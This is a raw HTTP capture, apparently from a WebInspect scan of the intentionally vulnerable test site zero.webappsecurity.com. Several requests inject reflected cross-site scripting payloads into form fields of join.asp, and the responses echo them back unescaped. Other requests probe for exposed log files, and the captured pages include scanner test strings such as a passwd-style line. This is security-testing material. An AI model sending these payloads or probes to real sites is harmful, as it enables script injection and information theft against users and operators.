<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
GET /pindex.asp HTTP/1.0
Referer: http://zero.webappsecurity.com:80/banklogin.asp?serviceName=FreebankCaastAccess&templateName=prod_sel.forte&source=Freebank&AD_REFERRING_URL=http://www.Freebank.com
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:24:17 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 1771
Content-Type: text/html
Cache-control: private
<HTML>
<HEAD>
<TITLE></TITLE>
</HEAD>
<BODY>
<!-- Hidden Reference comment: should find this file /test/hidden.txt -->
<P> The first section shows how a combo box can be used to product optional
pages<BR></P>
<FORM ACTION="pcomboindex.asp" METHOD="post">
<SELECT NAME="cboPage">
<OPTION SELECTED="SELECTED" VALUE="pc1">Show Page One</OPTION>
<OPTION VALUE="pc2">Show Page Two</OPTION>
<OPTION VALUE="pc3">Show page three</OPTION>
</SELECT><BR> <INPUT TYPE="submit" VALUE="Submit"> </FORM><BR> <HR>
<P><A HREF="plink.asp?a=b&c=12">Second section is link that passes
parameters to a sub page</A><BR> <BR> <A HREF="error.html">My ERROR</A> Third
example allows the user to input values and then shows them on the following
page</P> <BR> <HR>
<P>False Keyword that should not be flagged: root:x:0:0:/root:/bin/sh <BR>
False Keyword that should not be flagged: An error has occurred <BR> <BR> <BR>
<A HREF="adcenter.cgi">Link to adcenter.cgi exploit - Should be flagged by
SmartChecker</A> <BR> <A HREF="/user/adcenter.cgi">Link to adcenter.cgi exploit
- Should not be flagged due to not having keyword present</A> <BR>
<A HREF="/test/adcenter.cgi">Link to adcenter.cgi exploit - Should be flagged
by Smartchecker(Note: No HTML present)</A> <BR> <A
HREF="/linking/index.htm">Several chained directories</A> <BR>
<A HREF="/cfmerror.html">Cold Fusion Error</A> <BR> <A
HREF="/admin/help.cgi">Help</A> <BR> <A HREF="/aspnet.aspx">ASP.NET file</A>
</P>
<A HREF="sldjfsld;jsdl;kjfsdl;fj">Invalid link</A>
<a href="/cookietest/">A cookie test page</a><br>
<A HREF="http://www.spidynamics.com:34/login.asp">Timeout Link</A>
<A HREF="/auth/">Protected Page</A>
</BODY>
</HTML>GET /join.asp?name=>"'><img%20src="javascript:alert('XSS')">&email=&surname=&house=&street=&address2=&town=&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:55:35 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4013
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=">"'><img src="javascript:alert('XSS')">"></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
GET /join.asp?name=&email=&surname=&house=&street=&address2=&town=&postcode=>"><script>alert('XSS')</script>&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:55:28 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4006
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=">"><script>alert('XSS')</script>"></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
GET /W3SVC1/ex001102.log HTTP/1.0
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Date: Thu, 04 Dec 2003 16:42:55 GMT
Content-Type: application/octet-stream
Accept-Ranges: bytes
Last-Modified: Mon, 16 Jul 2001 03:47:18 GMT
ETag: "d828b92aadc11:8f6"
Content-Length: 19
LOGIC CHECK SUCCESSGET /W3SVC6/ HTTP/1.0
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 403 Access Forbidden
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:26:12 GMT
Content-Type: text/html
Content-Length: 172
<html><head><title>Directory Listing Denied</title></head>
<body><h1>Directory Listing Denied</h1>This Virtual Directory does not allow contents to be listed.</body></html>GET /errors/errors.log HTTP/1.0
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Date: Thu, 04 Dec 2003 16:42:24 GMT
Content-Type: application/octet-stream
Accept-Ranges: bytes
Last-Modified: Mon, 16 Jul 2001 03:47:16 GMT
ETag: "1ebfab1aadc11:8f6"
Content-Length: 8277
<TITLE>LSWEB General Access Error Log</TITLE>Today is: 02-21-2001.<br>You are connecting from 65.80.48.114<br>Using Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)<p>You can use the following to debug your CGI scripts<BR>Reload to update<HR><PRE>[Wed Feb 21 11:10:53 2001] [notice] child pid 20073 exit signal Segmentation Fault (11), possible coredump in /usr/local/web/apache-1.3.9
[Wed Feb 21 11:10:58 2001] [error] [client 192.107.108.150] Premature end of script headers: /www/htdocs/depts/anth/discus/scripts/show.cgi
[Wed Feb 21 11:10:58 2001] [error] [client 192.107.108.150] Premature end of script headers: /www/htdocs/depts/anth/discus/scripts/show.cgi
[Wed Feb 21 11:11:39 2001] [error] [client 62.104.210.91] File does not exist: /www/htdocs/depts/soc/robots.txt
[Wed Feb 21 11:11:56 2001] [error] [client 38.194.33.193] File does not exist: /www/htdocs/depts/anth/projects/elpilar/transparent.gif
[Wed Feb 21 11:12:03 2001] [notice] child pid 20084 exit signal Segmentation Fault (11), possible coredump in /usr/local/web/apache-1.3.9
[Wed Feb 21 11:12:05 2001] [info] [client 209.244.133.207] (32)Broken pipe: client stopped connection before send mmap completed
[Wed Feb 21 11:12:08 2001] [info] server seems busy, (you may need to increase StartServers, or Min/MaxSpareServers), spawning 8 children, there are 7 idle, and 33 total children
[Wed Feb 21 11:12:09 2001] [notice] child pid 20094 exit signal Segmentation Fault (11), possible coredump in /usr/local/web/apache-1.3.9
[Wed Feb 21 11:12:10 2001] [notice] child pid 20096 exit signal Segmentation Fault (11), possible coredump in /usr/local/web/apache-1.3.9
[Wed Feb 21 11:12:24 2001] [error] [client 38.194.33.193] File does not exist: /www/htdocs/depts/anth/projects/elpilar/transparent.gif
[Wed Feb 21 11:12:28 2001] [error] [client 38.194.33.193] File does not exist: /www/htdocs/lsweb/projects/pilarweb/transparent.gif
[Wed Feb 21 11:12:47 2001] [info] [client 165.91.173.150] (32)Broken pipe: client stopped connection before send mmap completed
[Wed Feb 21 11:13:04 2001] [error] [client 207.107.50.207] File does not exist: /www/htdocs/depts/anth/robots.txt
[Wed Feb 21 11:13:11 2001] [info] server seems busy, (you may need to increase StartServers, or Min/MaxSpareServers), spawning 8 children, there are 5 idle, and 33 total children
[Wed Feb 21 11:13:13 2001] [error] [client 208.219.77.29] File does not exist: /www/htdocs/depts/ger/robots.txt
[Wed Feb 21 11:13:13 2001] [notice] child pid 20115 exit signal Segmentation Fault (11), possible coredump in /usr/local/web/apache-1.3.9
[Wed Feb 21 11:13:18 2001] [info] [client 204.19.14.93] (32)Broken pipe: client stopped connection before send mmap completed
[Wed Feb 21 11:14:17 2001] [info] [client 209.146.77.133] (32)Broken pipe: client stopped connection before send mmap completed
[Wed Feb 21 11:14:26 2001] [error] [client 38.194.33.193] File does not exist: /www/htdocs/lsweb/projects/pilarweb/transparent.gif
[Wed Feb 21 11:14:36 2001] [error] [client 38.194.33.193] File does not exist: /www/htdocs/lsweb/projects/pilarweb/transparent.gif
[Wed Feb 21 11:14:48 2001] [info] [client 128.111.225.51] (32)Broken pipe: client stopped connection before send mmap completed
[Wed Feb 21 11:16:15 2001] [error] [client 195.93.66.164] Premature end of script headers: /www/htdocs/depts/ger/projects/hesse/cgi-bin/Count.cgi
[Wed Feb 21 11:16:26 2001] [error] [client 207.55.56.14] File does not exist: /www/htdocs/depts/artst/terminals/acker/acker.html
[Wed Feb 21 11:16:28 2001] [error] [client 38.194.33.193] File does not exist: /www/htdocs/lsweb/projects/pilarweb/transparent.gif
[Wed Feb 21 11:16:28 2001] [info] [client 216.125.117.6] send mmap timed out
[Wed Feb 21 11:16:33 2001] [error] [client 38.194.33.193] File does not exist: /www/htdocs/lsweb/projects/pilarweb/transparent.gif
[Wed Feb 21 11:16:34 2001] [error] [client 63.211.243.14] File does not exist: /www/htdocs/lsweb/projects/pilarweb/transparent.gif
[Wed Feb 21 11:16:36 2001] [info] [client 129.252.222.2] (32)Broken pipe: client stopped connection before send mmap completed
[Wed Feb 21 11:16:37 2001] [error] [client 128.111.96.187] File does not exist: /www/htdocs/depts/soc/projects/ct3/spacer1.gif
[Wed Feb 21 11:16:48 2001] [error] [client 63.227.243.33] Premature end of script headers: /www/htdocs/depts/anth/discus/scripts/show.cgi
[Wed Feb 21 11:16:49 2001] [notice] child pid 20154 exit signal Segmentation Fault (11), possible coredump in /usr/local/web/apache-1.3.9
[Wed Feb 21 11:16:58 2001] [info] [client 128.111.96.187] (32)Broken pipe: client stopped connection before send mmap completed
[Wed Feb 21 11:17:14 2001] [info] [client 128.111.165.82] (32)Broken pipe: client stopped connection before send mmap completed
[Wed Feb 21 11:17:36 2001] [info] [client 130.160.7.76] (32)Broken pipe: client stopped connection before send mmap completed
[Wed Feb 21 11:17:41 2001] [error] [client 63.227.243.33] Premature end of script headers: /www/htdocs/depts/anth/discus/scripts/show.cgi
[Wed Feb 21 11:17:43 2001] [notice] child pid 20158 exit signal Segmentation Fault (11), possible coredump in /usr/local/web/apache-1.3.9
[Wed Feb 21 11:18:11 2001] [error] [client 160.39.194.62] Premature end of script headers: /www/htdocs/depts/ger/projects/hesse/cgi-bin/Count.cgi
[Wed Feb 21 11:18:18 2001] [error] [client 160.39.194.62] Premature end of script headers: /usr/local/web/wwwthreads//postlist.pl
[Wed Feb 21 11:18:33 2001] [info] [client 128.111.96.187] (32)Broken pipe: client stopped connection before send mmap completed
[Wed Feb 21 11:18:42 2001] [error] [client 165.138.105.253] File does not exist: /www/htdocs/depts/ger/projects/hesse/hesse.html
[Wed Feb 21 11:19:04 2001] [error] [client 209.202.148.35] File does not exist: /www/htdocs/depts/writ/robots.txt
[Wed Feb 21 11:19:08 2001] [error] [client 216.35.103.75] File does not exist: /www/htdocs/depts/artst/~tvc/v09/interviews/v09int.ser_ulm.html
[Wed Feb 21 11:19:24 2001] [notice] child pid 20278 exit signal Segmentation Fault (11), possible coredump in /usr/local/web/apache-1.3.9
[Wed Feb 21 11:19:27 2001] [notice] child pid 20282 exit signal Segmentation Fault (11), possible coredump in /usr/local/web/apache-1.3.9
[Wed Feb 21 11:19:28 2001] [info] [client 195.205.28.2] (32)Broken pipe: client stopped connection before send mmap completed
[Wed Feb 21 11:19:34 2001] [notice] child pid 20284 exit signal Segmentation Fault (11), possible coredump in /usr/local/web/apache-1.3.9
[Wed Feb 21 11:21:24 2001] [error] [client 207.55.56.14] File does not exist: /www/htdocs/depts/artst/terminals/t1/wwwboard/faq.html
[Wed Feb 21 11:21:25 2001] [notice] child pid 20397 exit signal Segmentation Fault (11), possible coredump in /usr/local/web/apache-1.3.9
[Wed Feb 21 11:21:26 2001] [notice] child pid 20399 exit signal Segmentation Fault (11), possible coredump in /usr/local/web/apache-1.3.9
[Wed Feb 21 11:21:27 2001] [notice] child pid 20400 exit signal Segmentation Fault (11), possible coredump in /usr/local/web/apache-1.3.9
[Wed Feb 21 11:21:28 2001] [info] [client 151.188.89.64] (32)Broken pipe: client stopped connection before send body completed
[Wed Feb 21 11:22:11 2001] [error] [client 206.110.15.140] File does not exist: /www/htdocs/lsweb/projects/pilarweb/transparent.gif
[Wed Feb 21 11:22:11 2001] [error] [client 206.110.15.140] File does not exist: /www/htdocs/lsweb/projects/pilarweb/transparent.gif
[Wed Feb 21 11:23:28 2001] [notice] child pid 20422 exit signal Segmentation Fault (11), possible coredump in /usr/local/web/apache-1.3.9
[Wed Feb 21 11:23:37 2001] [error] [client 65.5.146.93] File does not exist: /www/htdocs/depts/writ/faculty/johnston/courses/writ2/w01
[Wed Feb 21 11:23:54 2001] [error] [client 200.15.34.155] File does not exist: /www/htdocs/lsweb/projects/pilarweb/transparent.gif
[Wed Feb 21 11:24:53 2001] [error] [client 128.111.36.88] File does not exist: /www/htdocs/depts/anth/classes/wo1/anth2
[Wed Feb 21 11:25:02 2001] [error] [client 128.111.36.88] File does not exist: /www/htdocs/depts/anth/classes/wo1/anth2
[Wed Feb 21 11:25:09 2001] [error] [client 216.208.71.130] File does not exist: /www/htdocs/depts/ger/projects/hesse/hesse.html
</PRE>
GET /join.asp?name=&email=&surname=&house=&street=&address2=&town=>"'><img%20src="javascript:alert('XSS')">&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:55:39 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4013
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=">"'><img src="javascript:alert('XSS')">"></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
POST /pcomboindex.asp HTTP/1.0
Referer: http://zero.webappsecurity.com:80/pindex.asp
Content-Length: 11
Content-Type: application/x-www-form-urlencoded
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; CustomCookie=WebInspect
cboPage=pc3HTTP/1.1 302 Object moved
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:24:21 GMT
X-Powered-By: ASP.NET
Location: p3.asp
Connection: Keep-Alive
Content-Length: 121
Content-Type: text/html
Cache-control: private
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="">here</a>.</body>
GET /join.asp?name=&email=&surname=&house=&street=&address2=>"'><img%20src="javascript:alert('XSS')">&town=&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:55:36 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4013
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
